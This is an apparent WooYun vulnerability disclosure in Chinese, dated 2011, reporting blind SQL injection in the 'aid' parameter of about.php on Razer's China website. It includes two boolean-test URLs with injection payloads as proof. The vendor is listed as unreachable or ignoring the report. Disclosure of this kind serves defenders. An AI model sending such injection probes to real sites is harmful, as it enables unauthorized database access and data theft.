漏洞概要
缺陷编号: WooYun-2011-01402
漏洞标题: 雷蛇官方网站mysql注射漏洞
相关厂商: 雷蛇官网
漏洞作者: 路人甲
提交时间: 2011-02-23
公开时间: 2011-02-23
漏洞类型: SQL注射漏洞
危害等级: 中
漏洞状态: 未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org
漏洞详情
简要描述:
对sql查询过滤不严导致典型盲注,可获取数据库信息。
详细说明:
aid参数存在注入,没啥好解释的了。
漏洞证明:
http://cn.razerzone.com/about.php?aid=4%20aND%2011%3E10此页返回正常
http://cn.razerzone.com/about.php?aid=4%20aND%2011%3E12此页返回异常
0 条评论。